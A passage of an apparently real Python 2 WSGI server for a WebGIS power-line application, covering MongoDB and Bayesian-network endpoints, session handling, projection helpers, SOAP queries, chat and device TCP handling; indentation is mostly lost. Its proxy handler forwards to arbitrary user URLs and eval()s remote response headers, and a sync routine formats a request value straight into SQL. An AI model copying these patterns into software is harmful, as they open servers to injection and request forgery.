# obj[i] = convert_strkey_to_bool(obj[i])
# if isinstance(obj, dict):
# for k in obj.keys():
# if k in ['true', u'true']:
# obj[True] = obj[k]
# del obj['true']
# del obj[u'true']
# elif k in ['false', u'false']:
# obj[False] = obj[k]
# del obj['false']
# del obj[u'false']
# obj[k] = convert_strkey_to_bool(obj[k])
#
# return obj
def save_by_id(querydict, collection_name):
ret = []
collection = get_collection(collection_name)
if isinstance(querydict, list):
ids = []
for i in querydict:
if i['_id'] is None:
del i['_id']
id = collection.save(db_util.add_mongo_id(i))
if id:
ids.append(id)
ret = list(collection.find({'_id':{'$in':ids}}))
elif isinstance(querydict, dict):
id = collection.save(db_util.add_mongo_id(querydict))
ret = collection.find_one({'_id':id})
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def delete_by_id(querydict, collection_name):
ret = ''
collection = get_collection(collection_name)
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'record_not_exist' }, ensure_ascii=True, indent=4)
if isinstance(querydict['_id'], list):
ids = db_util.add_mongo_id(querydict['_id'])
cond = {'_id':{'$in':ids}}
collection.remove(cond)
ret = json.dumps(db_util.remove_mongo_id(querydict['_id']), ensure_ascii=True, indent=4)
return ret
def bayesian_query_domains_range(querydict):
ret = []
collection = get_collection('bayesian_domains_range')
ret = list(collection.find({}))
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def bayesian_save_domains_range(querydict):
return save_by_id(querydict, 'bayesian_domains_range')
def bayesian_delete_domains_range(querydict):
return delete_by_id(querydict, 'bayesian_domains_range')
def bayesian_query_node(querydict):
ret = []
if querydict.has_key('line_name') and len(querydict['line_name']):
collection = get_collection('bayesian_nodes')
ret = list(collection.find({'line_name':querydict['line_name']}))
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def bayesian_query_graphiz(querydict):
ret = ''
if querydict.has_key('line_name') and len(querydict['line_name']):
g = create_bbn_by_line_name(querydict['line_name'])
dpi = 100
rankdir = 'LL'
if querydict.has_key('dpi') and len(querydict['dpi']):
dpi = int(querydict['dpi'])
if querydict.has_key('rankdir') and len(querydict['rankdir']):
rankdir = querydict['rankdir']
ret = g.get_graphviz_source(dpi, rankdir)
return enc(ret)
def bayesian_save_node(querydict):
return save_by_id(querydict, 'bayesian_nodes')
def bayesian_delete_node(querydict):
ret = '[]'
delete_by_id(querydict, 'bayesian_nodes')
collection = get_collection('bayesian_nodes')
if querydict.has_key('names'):
if isinstance(querydict['names'], list):
# names = [str(i) for i in querydict['names']]
names = querydict['names']
l = list(collection.find({'conditions': {'$elemMatch': {'$elemMatch': {'$elemMatch': {'$elemMatch':{'$in': names}}}}}}))
for i in l:
existlist = []
conditions = []
for ii in i['conditions']:
idx = i['conditions'].index(ii)
tmp = []
for iii in ii[0]:
# idx1 = ii[0].index(iii)
if not iii[0] in names:
tmp.append(iii)
ii[0] = tmp
i['conditions'][idx] = ii
for ii in i['conditions']:
key = ''
for iii in ii[0]:
key += iii[0] + ':' + iii[1] + '|'
if not key in existlist:
existlist.append(key)
conditions.append(ii)
i['conditions'] = conditions
collection.save(i)
if querydict.has_key('line_name') and len(querydict['line_name'])>0:
ret = bayesian_query_node(querydict)
return ret
def bayesian_query_predict(querydict):
ret = []
if querydict.has_key('line_name') and len(querydict['line_name']):
g = create_bbn_by_line_name(querydict['line_name'])
del querydict['line_name']
qd = {}
querymulti = False
for k in querydict.keys():
if isinstance(querydict[k], unicode):
qd[str(k)] = str(querydict[k])
elif isinstance(querydict[k], list) and k == u'line_state':
querymulti = True
else:
qd[str(k)] = querydict[k]
if querymulti:
for i in querydict['line_state']:
qd['line_state'] = str(i)
ret.append({'line_state':i, 'result':bayes_util.query_bbn_condition(g, **qd)})
else:
ret = bayes_util.query_bbn_condition(g, **qd)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
return ret
def reset_unit_by_line_name(line_name):
collection = get_collection('bayesian_nodes')
units = list(collection.find({'line_name':line_name, 'name':{'$regex':'^unit_[0-9]$'}}))
data = bayes_util.get_state_examination_data_by_line_name(line_name)
o = bayes_util.calc_probability_unit(data)
for unit in units:
if o.has_key(unit['name']):
unit['conditions'] = o[unit['name']]
# print(unit['name'])
# print(unit['conditions'])
collection.save(unit)
ret = list(collection.find({'line_name':line_name}).sort('name', pymongo.ASCENDING))
return ret
def bayesian_reset_unit(querydict):
ret = []
if querydict.has_key('line_name') and len(querydict['line_name']):
ret = reset_unit_by_line_name(querydict['line_name'])
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def build_additional_condition(line_name, cond):
ret = cond
collection = get_collection('bayesian_nodes')
l = list(collection.find({'line_name':line_name}))
for node in l:
ret[node['name']] = node['conditions']
return ret
def create_bbn_by_line_name(line_name):
cond = bayes_util.build_state_examination_condition(line_name)
cond = build_additional_condition(line_name, cond)
g = None
if bayes_util.USE_C_MODULE:
            print('using C-accelerated module...')
g = bayes_util.build_bbn_from_conditionals(cond)
else:
print('using pure-python module...')
g = bayes_util.build_bbn_from_conditionals_plus(cond)
return g
statuscode, headers, body = '200 OK', {}, ''
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint, args = urls.match()
if args.has_key('_id') and isinstance(querydict, dict):
querydict['_id'] = args['_id']
if endpoint == 'bayesian_query_node':
body = bayesian_query_node(querydict)
elif endpoint == 'bayesian_save_node':
body = bayesian_save_node(querydict)
elif endpoint == 'bayesian_query_predict':
body = bayesian_query_predict(querydict)
elif endpoint == 'bayesian_reset_unit':
body = bayesian_reset_unit(querydict)
elif endpoint == 'bayesian_query_graphiz':
body = bayesian_query_graphiz(querydict)
headers['Content-Type'] = 'text/plain'
elif endpoint == 'bayesian_delete_node':
body = bayesian_delete_node(querydict)
elif endpoint == 'bayesian_save_domains_range':
body = bayesian_save_domains_range(querydict)
elif endpoint == 'bayesian_delete_domains_range':
body = bayesian_delete_domains_range(querydict)
elif endpoint == 'bayesian_query_domains_range':
body = bayesian_query_domains_range(querydict)
return statuscode, headers, body
headers = {}
headerslist = []
cookie_header = None
statuscode = '200 OK'
body = ''
path_info = environ['PATH_INFO']
if 'proxy.cgi' in path_info:
statuscode, headers, body = handle_proxy_cgi(environ)
elif path_info == '/test':
statuscode, headers, body = handle_test(environ)
elif path_info == '/get':
statuscode, headers, body = handle_get_method(environ)
elif path_info == '/post':
statuscode, headers, body = handle_post_method(environ)
elif path_info == '/wmts':
statuscode, headers, body = handle_wmts(environ)
elif path_info == '/tiles':
statuscode, headers, body = handle_tiles(environ)
elif '/arcgistile' in path_info:
statuscode, headers, body = handle_arcgistile(environ)
elif path_info == '/terrain/layer.json' or path_info[-8:] == '.terrain':
statuscode, headers, body = handle_terrain(environ)
#elif path_info[-8:] == '.terrain':
#return handle_terrain1(environ)
# elif path_info == '/wfs':
# statuscode, headers, body = handle_wfs(environ)
elif path_info =='/create_cluster' or path_info =='/kill_cluster':
statuscode, headers, body = handle_cluster(environ)
elif path_info == '/websocket':
statuscode, headers, body = handle_websocket(environ)
elif len(path_info)>6 and path_info[:6] == '/proxy':
statuscode, headers, body = proxy(environ)
headers['Cache-Control'] = 'no-cache'
# elif path_info == '/anti_bird_equip_list':
# statuscode, headers, body = anti_bird_equip_list(environ)
# elif path_info == '/anti_bird_equip_tower_mapping':
# statuscode, headers, body = anti_bird_equip_tower_mapping(environ)
# elif path_info == '/anti_bird_get_latest_records_by_imei':
# statuscode, headers, body = anti_bird_get_latest_records_by_imei(environ)
else:
if path_info[-1:] == '/':
path_info = gConfig['web']['indexpage']
if str(gConfig['webgis']['session']['enable_session'].lower()) == 'true' :
# and path_info in ['/login', '/logout', gConfig['web']['loginpage'], gConfig['web']['indexpage'], gConfig['web']['mainpage']]:
if gSessionStore is None:
gSessionStore = FilesystemSessionStore()
is_expire = False
with session_manager(environ):
sess, cookie_header, is_expire = session_handle(environ, gRequest, gSessionStore)
if path_info == str(gConfig['web']['unauthorizedpage']):
if not sess.has_key('ip'):
sess['ip'] = environ['REMOTE_ADDR']
gSessionStore.save_if_modified(sess)
headerslist.append(('Content-Type', str(gConfig['mime_type']['.html'])))
headerslist.append(cookie_header)
statuscode, headers, body = handle_static(environ, gConfig['web']['unauthorizedpage'])
start_response('401 Unauthorized', headerslist)
return [body]
if path_info == '/logout':
gSessionStore.delete(sess)
sess, cookie_header, is_expire = session_handle(environ, gRequest, gSessionStore)
headerslist.append(cookie_header)
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
start_response('200 OK', headerslist)
return [json.dumps({'result':u'ok'}, ensure_ascii=True, indent=4)]
if is_expire:
if not sess.has_key('ip'):
sess['ip'] = environ['REMOTE_ADDR']
gSessionStore.save_if_modified(sess)
headerslist.append(('Content-Type', str(gConfig['mime_type']['.html'])))
headerslist.append(cookie_header)
statuscode, headers, body = handle_static(environ, gConfig['web']['unauthorizedpage'])
start_response('401 Unauthorized', headerslist)
return [body]
# headerslist.append(('Location', str(gConfig['web']['expirepage'])))
# start_response('302 Redirect', headerslist)
# return ['']
# headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
# statuscode = '200 OK'
# body = json.dumps({'result':u'session_expired'}, ensure_ascii=True, indent=4)
if path_info == '/login':
user = handle_login(environ)
if user:
sess = gSessionStore.session_class(user, sess.sid, False)
sess['username'] = user['username']
cookie_header = set_cookie_data(gRequest, {'_id':user['_id'], 'username': user['username'], 'displayname': user['displayname']})
gSessionStore.save_if_modified(sess)
headerslist.append(cookie_header)
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
start_response('200 OK', headerslist)
return [json.dumps(sess, ensure_ascii=True, indent=4)]
else:
headerslist.append(cookie_header)
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
start_response('200 OK', headerslist)
return [json.dumps({'result':u'用户名或密码错误'}, ensure_ascii=True, indent=4)]
if path_info == str(gConfig['web']['mainpage']):
#401 Unauthorized
#if session_id is None or token is None:
headerslist.append(('Content-Type', str(gConfig['mime_type']['.html'])))
headerslist.append(cookie_header)
if sess is None or len(sess.keys())==0 or len(sess.sid)==0 or not sess.has_key('username'):
statuscode, headers, body = handle_static(environ, gConfig['web']['unauthorizedpage'])
statuscode = '401 Unauthorized'
start_response(statuscode, headerslist)
return [body]
if not is_expire and len(sess.sid)>0:
if 'state_examination' in path_info:
statuscode, headers, body = handle_state_examination(environ)
elif 'bayesian/' in path_info:
statuscode, headers, body = handle_bayesian(environ)
elif 'antibird/' in path_info:
statuscode, headers, body = handle_antibird(environ)
else:
statuscode, headers, body = handle_static(environ, path_info)
else:
if path_info == '/login' and str(gConfig['webgis']['session']['enable_session'].lower()) != 'true':
path_info = gConfig['web']['mainpage']
if 'state_examination/' in path_info:
statuscode, headers, body = handle_state_examination(environ)
elif 'antibird/' in path_info:
statuscode, headers, body = handle_antibird(environ)
elif 'bayesian/' in path_info:
statuscode, headers, body = handle_bayesian(environ)
else:
statuscode, headers, body = handle_static(environ, path_info)
#headkeys = set([i[0] for i in headerslist])
headers = CORS_header(headers)
if cookie_header:
headerslist.append(cookie_header)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
# headerslist = add_to_headerlist(headerslist, 'Cache-Control', 'no-cache')
# print(headerslist)
start_response(statuscode, headerslist)
return [body]
def add_to_headerlist(headerslist, key, value):
ret = headerslist
existidx = -1
for i in ret:
if i[0] == key:
existidx = ret.index(i)
break
if existidx < 0:
ret.append((key, value))
else:
ret[existidx] = (key, value)
return ret
def application_markdown(environ, start_response):
global gConfig, gRequest, gSessionStore
headers = {}
headerslist = []
path_info = environ['PATH_INFO']
if path_info == '/get':
statuscode, headers, body = handle_get_method(environ)
elif path_info == '/post':
statuscode, headers, body = handle_post_method(environ)
else:
if path_info[-1:] == '/':
path_info += gConfig['web']['indexpage']
statuscode, headers, body = handle_static(environ, path_info)
headers = CORS_header(headers)
for k in headers:
headerslist.append((k, headers[k]))
start_response(statuscode, headerslist)
return [body]
def handle_proxy_cgi(environ):
global gConfig, gHttpClient
method = environ['REQUEST_METHOD']
post_data = ''
if method == "POST":
qs = environ['PATH_INFO']
buf = environ['wsgi.input'].read()
post_data = urllib.unquote_plus(buf)
d = cgi.parse(None, environ)
if d.has_key("url"):
url = d["url"][0]
else:
url = 'http://XIEJUN-DESKTOP:88'
else:
fs = cgi.FieldStorage()
url = fs.getvalue('url', "http://XIEJUN-DESKTOP:88")
s = ''
headers = {'Content-Type': 'text/plain;charset=' + ENCODING}
try:
if url.startswith("http://") or url.startswith("https://"):
request = None
response = None
http = None
urlobj = URL(url)
if not gHttpClient.has_key('proxy_cgi'):
gHttpClient['proxy_cgi'] = HTTPClient(urlobj.host, port=urlobj.port, concurrency=100)
client = gHttpClient['proxy_cgi']
if method == "POST":
#length = int(environ["CONTENT_LENGTH"])
headers["Content-Type"] = environ["CONTENT_TYPE"]
response = client.post(urlobj.request_uri, post_data, headers)
else:
response = client.get(urlobj.request_uri)
if response:
h = str(response.info())
#if i.has_key("Content-Type"):
#print("Content-Type: %s" % (i["Content-Type"]))
hh = eval(h)
responseh = []
for i in hh:
if i[0] in ['Content-Type', 'Date', 'Server', ]:
responseh.append(i)
s = response.read()
client.close()
headers['Content-Length'] = str(len(s))
else:
s += "Illegal request."
except Exception, E:
s += "Status: 500 Unexpected Error"
s += "Content-Type: text/plain"
s += "Some unexpected error occurred. Error text was:%s" % E.message
return '200 OK', headers, s
def get_host_ip():
ret = []
if sys.platform == 'win32':
ret.append('127.0.0.1')
localIP = socket.gethostbyname(socket.gethostname())
#print ("local ip:%s " % localIP)
ipList = socket.gethostbyname_ex(socket.gethostname())
for i in ipList:
if i != localIP:
#if isinstance(i, str):
#print(re.findall('\d+\.\d+\.\d+\.\d+',i))
if isinstance(i, list):
for ii in i:
if len(re.findall('\d+\.\d+\.\d+\.\d+',ii))>0:
ret.append(ii)
#print("external IP:%s" % i )
elif 'linux' in sys.platform:
import commands
ips = commands.getoutput("/sbin/ifconfig | grep -i \"inet\" | grep -iv \"inet6\" | awk {'print $2'} | sed -ne 's/addr\:/ /p'")
arr = ips.split('\n')
for i in arr:
ret.append(i.strip())
return ret
def clear_tmp():
tmp_dir = r'C:\Users\Jeffrey\AppData\Local\ESRI\Local Caches\MapCacheV1'
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
tmp_dir = r'C:\Users\Jeffrey\AppData\Local\ESRI\Local Caches\GlobeCache'
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
def get_scaleDenominator(zoomlist):
#tileMatrixMaxX = tileMatrixMinX + tileWidth * (scaleDenominator * pixelSize / metersPerUnit) * matrixWidth
#tileMatrixMinY = tileMatrixMaxY - tileHeight * (scaleDenominator * pixelSize / metersPerUnit) * matrixHeight
#tileWidth * (scaleDenominator * pixelSize / metersPerUnit) * matrixWidth = tileMatrixMaxX - tileMatrixMinX
#tileHeight * (scaleDenominator * pixelSize / metersPerUnit) * matrixHeight = tileMatrixMaxY - tileMatrixMinY
#scaleDenominator * pixelSize / metersPerUnit = (tileMatrixMaxX - tileMatrixMinX)/(tileWidth * matrixWidth)
#scaleDenominator * pixelSize / metersPerUnit = (tileMatrixMaxY - tileMatrixMinY)/(tileHeight * matrixHeight)
#scaleDenominator * pixelSize = metersPerUnit * (tileMatrixMaxX - tileMatrixMinX)/(tileWidth * matrixWidth)
#scaleDenominator * pixelSize = metersPerUnit * (tileMatrixMaxY - tileMatrixMinY)/(tileHeight * matrixHeight)
#scaleDenominator = metersPerUnit/pixelSize * (tileMatrixMaxX - tileMatrixMinX)/(tileWidth * matrixWidth)
#scaleDenominator = metersPerUnit/pixelSize * (tileMatrixMaxY - tileMatrixMinY)/(tileHeight * matrixHeight)
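    # Worked example of the last formula above (a hedged sketch using the
    # standard OGC WMTS "GoogleMapsCompatible" constants, not this function's
    # geodesic-distance variant): with metersPerUnit = 1, pixelSize = 0.00028 m,
    # tileWidth = 256 and a world span of 2 * 20037508.3427892 m, level 0
    # (matrixWidth = 1) gives
    #   scaleDenominator = 40075016.6855784 / (0.00028 * 256 * 1) ~= 559082264.03
    # and every further zoom level halves that value.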
metersPerUnit = float(gConfig['wmts']['metersPerUnit'])
pixelSize = float(gConfig['wmts']['pixelSize'])
tileWidth,tileHeight = 256.0, 256.0
tileMatrixMinX, tileMatrixMaxX = (26.0, 102.0), (26.0, 104.0)
tileMatrixMinY, tileMatrixMaxY = (24.0, 102.0), (26.0, 102.0)
for i in zoomlist:
#print('%d=%d' % (i , mapUtils.tiles_on_level(i)))
#mapUtils.countDistanceFromLatLon()
matrixHeight = matrixWidth = mapUtils.tiles_on_level(i)
print('%d=%d' % (i , matrixHeight))
#scaleDenominatorX = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxX , tileMatrixMinX) * 1000./(tileWidth * matrixWidth)
#scaleDenominatorY = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) * 1000./(tileHeight * matrixHeight)
#print('scaleDenominatorX=%f, scaleDenominatorY=%f' % (scaleDenominatorX, scaleDenominatorY))
#scaleDenominator = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) * 1000. /(tileHeight * matrixHeight)
scaleDenominator = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) /(tileHeight * matrixHeight)
print('scaleDenominator=%f' % scaleDenominator)
def ToGeographic(mercatorX_lon, mercatorY_lat):
if abs(mercatorX_lon) < 180 and abs(mercatorY_lat) < 90:
return 0, 0
if abs(mercatorX_lon) > 20037508.3427892 or abs(mercatorY_lat) > 20037508.3427892 :
return 0, 0
    x = mercatorX_lon
    y = mercatorY_lat
    num3 = x / 6378137.0
    num4 = num3 * 57.295779513082323
num5 = math.floor(float(num4 + 180.0) / 360.0)
num6 = num4 - (num5 * 360.0)
num7 = 1.5707963267948966 - (2.0 * math.atan(math.exp((-1.0 * y) / 6378137.0)))
lon = num6
lat = num7 * 57.295779513082323
return lon, lat
def ToWebMercator(lon, lat):
if abs(lon) > 180 or abs(lat) > 90:
return 0, 0
num = lon * 0.017453292519943295
x = 6378137.0 * num
a = lat * 0.017453292519943295
mercatorX_lon = x
mercatorY_lat = 3189068.5 * math.log((1.0 + math.sin(a)) / (1.0 - math.sin(a)))
return mercatorX_lon, mercatorY_lat
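# Illustrative round-trip check for the two Web Mercator helpers above
# (approximate values; not part of the original code path):
#   x, y = ToWebMercator(102.0, 25.0)
#   lon, lat = ToGeographic(x, y)   # lon ~= 102.0, lat ~= 25.0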
def handle_requset_sync(obj):
ret = {'result':''}
if obj.has_key('area') and obj['area'] and len(obj['area'])>0:
kmgd, kmgdgeo, kmgdgeotmp = db_util.create_sde_conn(obj['area'])
if obj.has_key('odbc'):
if obj['odbc'] == 'TABLE_LINE':
l = db_util.odbc_get_records('TABLE_LINE', '1=1', obj['area'])
ret['result']= l
elif obj['odbc'] == 'TABLE_TOWER':
l = db_util.odbc_get_records('TABLE_TOWER', '1=1', obj['area'])
ret['result']= l
elif obj.has_key('op'):
if obj['op']=='download_task':
condition = '1=1'
if obj.has_key('team_id'):
condition += " AND team_id='%s'" % obj['team_id']
l = db_util.odbc_get_records('VIEW_TASK_ITEM', condition, obj['area'])
ret['result']= l
#elif obj['op']=='get_latest_stamp':
#f = '%Y-%m-%d %H:%M:%S'
#if obj.has_key('format'):
#f = obj['format']
#ret['result']= db_util.get_latest_stamp(f, obj['area'])
#elif obj['op']=='get_latest_3dd_stamp':
#f = '%Y-%m-%d %H:%M:%S'
#if obj.has_key('format'):
#f = obj['format']
#ret['result']= db_util.get_latest_3dd_stamp(f, obj['area'])
else:
print('unknown area')
ret['result'] = []
return ret
def soap_login():
client = SoapClient(wsdl='%s?wsdl' % gConfig['webservice']['location'], namespace = gConfig['webservice']['namespace'], timeout=int(gConfig['webservice']['timeout']))
response = client.login(username='', password='')
result = response['Result']
return result
def parse_thunder_counter_xml(xml):
ret = []
root = etree.fromstring(xml)
if root:
for Flash in root:
obj = {}
for child in Flash:
obj[child.tag] = child.text
ret.append(obj)
return ret
def soap_GetFlashofDate(start_time, end_time):
ret = {}
try:
client = SoapClient(wsdl='%s?wsdl' % gConfig['webservice']['location'], namespace = gConfig['webservice']['namespace'], timeout=int(gConfig['webservice']['timeout']))
response = client.GetFlashofDate(in0=start_time, in1=end_time)
result = response['Result']
ret = parse_thunder_counter_xml(result)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret['err'] = sys.exc_info()[1].message
if hasattr(sys.exc_info()[1], 'reason'):
ret['err'] = str(sys.exc_info()[1].reason)
return ret
def soap_GetFlashofEnvelope(start_time, end_time, lng1, lng2, lat1, lat2):
ret = {}
try:
client = SoapClient(wsdl='%s?wsdl' % gConfig['webservice']['location'], namespace = gConfig['webservice']['namespace'], timeout=int(gConfig['webservice']['timeout']))
response = client.GetFlashofEnvelope(in0=start_time, in1=end_time, in2=lng1, in3=lng2, in4=lat1, in5=lat2)
result = response['Result']
ret = parse_thunder_counter_xml(result)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret['err'] = sys.exc_info()[1].message
if hasattr(sys.exc_info()[1], 'reason'):
ret['err'] = str(sys.exc_info()[1].reason)
return ret
def delete_expired_session(interval):
global gSessionStore
while 1:
gevent.sleep(interval)
if gSessionStore:
#print('session recycle checking')
gSessionStore.delete_expired_list()
ws_send('session_list', ws_session_query())
def joinedqueue_consumer_pay():
global gConfig, gJoinableQueue
interval = float(gConfig['pay_platform']['queue']['queue_consume_interval'])
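    # Items on gJoinableQueue are expected to carry the keys used by the
    # sign_and_send call below (inferred from that call, not from a schema):
    #   {'thirdpay': ..., 'method': 'POST', 'url': '...', 'data': {...}}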
while 1:
gevent.sleep(interval)
item = None
try:
item = gJoinableQueue.get()
except:
item = None
if item:
try:
sign_and_send(item['thirdpay'], item['method'], item['url'], item['data'])
finally:
gJoinableQueue.task_done()
def chat_offline_save_log(obj):
global gConfig, gClientMongo
def get_collection(collection):
ret = None
db_util.mongo_init_client('chat_platform')
db = db_util.gClientMongo['chat_platform'][gConfig['chat_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
id = None
if obj['op'] not in ['chat/online', 'chat/offline', 'chat/info/online', 'chat/info/offline', 'chat/request/contact/remove', 'chat/request/group/quit'] and obj.has_key('to'):
offlinecol = 'chat_log_offline'
if gConfig['chat_platform']['mongodb'].has_key('collection_chat_log_offline'):
offlinecol = gConfig['chat_platform']['mongodb']['collection_chat_log_offline']
collection = get_collection(offlinecol)
id = collection.save(db_util.add_mongo_id(obj))
return id
def chat_save_log(obj):
global gConfig, gClientMongo
def get_collection(collection):
ret = None
db_util.mongo_init_client('chat_platform')
db = db_util.gClientMongo['chat_platform'][gConfig['chat_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
id = None
if obj.has_key('op') and obj['op'] in ['chat/chat', 'chat/online', 'chat/offline']:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_chat_log'])
# if obj.has_key('timestamp'):
# obj['timestamp'] = datetime.datetime.fromtimestamp(obj['timestamp']/1000).strftime('%Y-%m-%d %H:%M:%S')
if obj['op'] in ['chat/online', 'chat/offline']:
obj1 = copy.deepcopy(obj)
for k in obj1.keys():
if not k in ['from', 'timestamp', 'op', 'to']:
del obj1[k]
if obj1.has_key('_id'):
del obj1['_id']
id = collection.save(db_util.add_mongo_id(obj1))
else:
id = collection.save(db_util.add_mongo_id(obj))
return id
def joinedqueue_consumer_chat():
global gConfig, gJoinableQueue, gWebSocketsMap
interval = float(gConfig['chat_platform']['queue']['queue_consume_interval'])
while 1:
gevent.sleep(interval)
item = None
try:
item = gJoinableQueue.get()
except:
item = None
if item:
try:
g = gevent.spawn(chat_save_log, item)
k = item['to']
if gWebSocketsMap.has_key(k):
for ws in gWebSocketsMap[k]:
if not ws.closed:
ws.send(json.dumps(item, ensure_ascii=True, indent=4))
else:
gevent.spawn(chat_offline_save_log, item)
finally:
gJoinableQueue.task_done()
def tcp_reconnect_check(interval=1):
global gConfig, gTcpReconnectCounter, gTcpSock
tcp_reconnect_threshold = int(gConfig['webgis']['anti_bird']['tcp_reconnect_threshold'])
gTcpReconnectCounter = tcp_reconnect_threshold
while 1:
gTcpReconnectCounter += interval
#print(gTcpReconnectCounter)
if gTcpReconnectCounter > tcp_reconnect_threshold:
gTcpReconnectCounter = 0
print('[%s]Trying to reconnect to anti-bird tcpserver [%s:%s]...' % (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), gConfig['webgis']['anti_bird']['tcp_host'], gConfig['webgis']['anti_bird']['tcp_port']))
if gTcpSock:
if not gTcpSock.closed:
gTcpSock.close()
del gTcpSock
gTcpSock = None
gevent.sleep(interval)
def tcp_print_exception():
e = sys.exc_info()[1]
message = ''
if hasattr(e, 'strerror'):
message = e.strerror
if message is None and hasattr(e, 'message'):
message = e.message
elif hasattr(e, 'message'):
message = e.message
else:
message = str(e)
print('connecting anti-bird server fail:%s' % message)
def tcp_connect():
global gConfig
tcp_host = gConfig['webgis']['anti_bird']['tcp_host']
tcp_port = int(gConfig['webgis']['anti_bird']['tcp_port'])
timeout = 5.0
try:
timeout = float(gConfig['webgis']['anti_bird']['tcp_timeout'])
except:
timeout = 5.0
sock = socket.create_connection((tcp_host, tcp_port), timeout=timeout)
sock.settimeout(None)
#sock = socket.create_connection((tcp_host, tcp_port))
sock.send("bird")
return sock
def tcp_recv(sock=None):
global gConfig, gWebSocketsMap, gTcpReconnectCounter, gTcpSock
def get_packet(astr):
ret = ''
rest = astr
if '###' in astr:
idx0 = astr.index('###') + 3
astr = astr[idx0:]
if '###' in astr:
idx1 = astr.index('###')
ret = astr[:idx1]
rest = astr[idx1+3:]
return ret, rest
def get_packets(astr):
ret = []
p, rest = get_packet(astr)
while len(p)>0:
ret.append(p)
p, rest = get_packet(rest)
return ret, rest
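    # Hand-traced examples of the '###'-delimited framing parsed above
    # (illustrative only, not taken from a device protocol spec):
    #   get_packets('###A######B###') -> (['A', 'B'], '')
    #   get_packets('###A###B')       -> (['A'], 'B')  # 'B' waits for more data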
def send_to_client(packets):
for imei in packets:
try:
obj = {'imei':imei}
for k in gWebSocketsMap.keys():
ws = gWebSocketsMap[k]
if not ws.closed:
ws.send(json.dumps(obj, ensure_ascii=True, indent=4))
except:
e = sys.exc_info()[1]
if hasattr(e, 'message'):
print('send_to_client error:%s' % e.message)
else:
print('send_to_client error:%s' % str(e))
def save_to_cache(astr):
pass
MAX_MSGLEN = int(gConfig['webgis']['anti_bird']['max_msg_len'])
tcp_reconnect_threshold = int(gConfig['webgis']['anti_bird']['tcp_reconnect_threshold'])
recvstr = ''
while 1:
try:
if gTcpSock is None:
gTcpSock = tcp_connect()
if gTcpSock and not gTcpSock.closed:
buf = bytearray(b"\n" * MAX_MSGLEN)
gTcpSock.recv_into(buf)
recvstr += buf.strip().decode("utf-8")
if len(recvstr)>0:
gTcpReconnectCounter = 0;
print('[%s]%s' % (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), recvstr))
packets, recvstr = get_packets(recvstr)
if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('update_to_cache') and gConfig['webgis']['anti_bird']['update_to_cache'].lower() == 'true':
save_to_cache(packets)
send_to_client(packets)
except:
recvstr = ''
tcp_print_exception()
if gTcpSock:
if not gTcpSock.closed:
gTcpSock.close()
del gTcpSock
gTcpSock = None
gevent.sleep(0.01)
def cycles_task():
global gConfig, gJoinableQueue
if gConfig['wsgi']['application'].lower() == 'authorize_platform':
gevent.spawn(delete_expired_session, int(gConfig['authorize_platform']['session']['session_cycle_check_interval']))
elif gConfig['wsgi']['application'].lower() == 'pay_platform' and gJoinableQueue:
gevent.spawn(joinedqueue_consumer_pay)
elif gConfig['wsgi']['application'].lower() == 'chat_platform' and gJoinableQueue:
gevent.spawn(joinedqueue_consumer_chat)
elif gConfig['wsgi']['application'].lower() == 'webgis':
if gConfig['webgis']['anti_bird'].has_key('enable_fetch') and gConfig['webgis']['anti_bird']['enable_fetch'].lower() == 'true':
interval = 1
if gConfig['webgis']['anti_bird'].has_key('cycle_interval'):
interval = int(gConfig['webgis']['anti_bird']['cycle_interval'])
gevent.spawn(tcp_recv, None)
gevent.spawn(tcp_reconnect_check, interval)
def mainloop_single( port=None, enable_cluster=False, enable_ssl=False):
global gConfig
gen_model_app_cache()
server = None
app = None
key = 'application_' + gConfig['wsgi']['application']
if globals().has_key(key):
print('application ready to start:%s' % gConfig['wsgi']['application'])
app = globals()[key]
else:
print('unknown application:%s' % gConfig['wsgi']['application'])
return
cycles_task()
if port and not enable_cluster:
if enable_ssl:
print('listening at host 127.0.0.1, port %d with ssl crypted' % port)
server = pywsgi.WSGIServer(('127.0.0.1', port), app, handler_class = WebSocketHandler, keyfile = gConfig['listen_port']['keyfile'], certfile = gConfig['listen_port']['certfile'])
else:
print('listening at host 127.0.0.1, port %d' % port)
server = pywsgi.WSGIServer(('127.0.0.1', port), app, handler_class = WebSocketHandler)
server.start()
server.serve_forever()
else:
if enable_ssl:
pport = port
if not pport:
pport = gConfig['listen_port']['ssl_port']
else:
pport = port
if not pport:
pport = gConfig['listen_port']['port']
host_list = get_host_ip()
admin = ''
